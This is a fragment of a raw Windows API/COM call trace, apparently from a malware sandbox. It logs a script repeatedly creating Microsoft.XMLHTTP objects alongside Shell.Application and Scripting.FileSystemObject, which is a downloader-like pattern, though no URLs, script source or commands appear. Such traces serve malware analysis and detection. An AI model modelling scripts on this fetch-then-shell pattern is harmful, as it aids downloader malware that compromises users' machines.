	[0371.642] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74e0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0372.330] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74e0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0372.330] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74e0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0372.330] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74e0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0372.330] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74e0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0372.330] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74e0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0372.330] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74e0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0372.330] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0372.330] SysStringLen (param_1=0x0) returned 0x0
	[0372.330] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0372.331] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0372.331] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x396820) returned 0x0
	[0372.331] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0372.331] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396860) returned 0x0
	[0372.331] ??2@YAPEAX_K@Z () returned 0x62f350
	[0372.331] Shell:IObjectWithSite:SetSite (This=0x396860, pUnkSite=0x62f350) returned 0x0
	[0372.331] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0372.331] Shell:IUnknown:Release (This=0x396860) returned 0x1
	[0372.331] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x396820) returned 0x0
	[0372.331] Shell:IUnknown:AddRef (This=0x396820) returned 0x3
	[0372.331] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0372.331] SysStringLen (param_1=0x0) returned 0x0
	[0372.331] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f030) returned 0x0
	[0372.335] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0372.335] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f030, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f000) returned 0x0
	[0372.335] FileSystemObject:IUnknown:Release (This=0x45f030) returned 0x0
	[0372.335] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0372.335] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f000) returned 0x0
	[0372.335] FileSystemObject:IUnknown:AddRef (This=0x45f000) returned 0x3
	[0372.937] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74e0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0372.937] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74e0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0372.937] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74e0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0372.938] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0372.938] SysStringLen (param_1=0x0) returned 0x0
	[0372.938] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0372.939] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0372.939] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74e0) returned 0x0
	[0372.939] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0372.939] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74e0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7498) returned 0x0
	[0372.939] ??2@YAPEAX_K@Z () returned 0x62f310
	[0372.939] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7498, pUnkSite=0x62f310) 
	[0372.939] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0372.939] XMLHTTPRequest:IUnknown:Release (This=0x49c7498) returned 0x0
	[0372.939] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74e0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74e0) returned 0x0
	[0372.939] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74e0) returned 0x3
	[0372.939] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74e0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0372.939] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74e0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0372.942] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74e0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0372.942] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0372.942] SysStringLen (param_1=0x0) returned 0x0
	[0372.942] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0372.943] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0372.943] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7720) returned 0x0
	[0372.943] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0372.943] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7788) returned 0x0
	[0372.943] ??2@YAPEAX_K@Z () returned 0x62f330
	[0372.943] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7788, pUnkSite=0x62f330) 
	[0372.943] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0372.943] XMLHTTPRequest:IUnknown:Release (This=0x49c7788) returned 0x0
	[0372.943] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7720) returned 0x0
	[0372.943] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7720) returned 0x3
	[0372.943] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0372.943] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7720, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0372.944] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0372.944] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0372.944] SysStringLen (param_1=0x0) returned 0x0
	[0372.944] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0372.944] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0372.944] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7840) returned 0x0
	[0372.944] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0372.944] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7840, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7548) returned 0x0
	[0372.944] ??2@YAPEAX_K@Z () returned 0x62f310
	[0372.944] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7548, pUnkSite=0x62f310) 
	[0372.944] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0372.944] XMLHTTPRequest:IUnknown:Release (This=0x49c7548) returned 0x0
	[0372.944] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7840, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7840) returned 0x0
	[0372.945] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7840) returned 0x3
	[0372.945] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7840, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0372.945] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7840, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0372.945] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7840, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0372.945] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0372.945] SysStringLen (param_1=0x0) returned 0x0
	[0372.945] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0372.945] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0372.945] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0372.945] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0372.946] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7788) returned 0x0
	[0372.946] ??2@YAPEAX_K@Z () returned 0x62f330
	[0372.946] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7788, pUnkSite=0x62f330) 
	[0372.946] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0372.946] XMLHTTPRequest:IUnknown:Release (This=0x49c7788) returned 0x0
	[0372.946] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0372.946] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0372.946] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0372.946] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0372.946] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0372.946] longjmp () 
	[0372.946] longjmp () 
	[0372.947] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0372.947] SysStringLen (param_1=0x0) returned 0x0
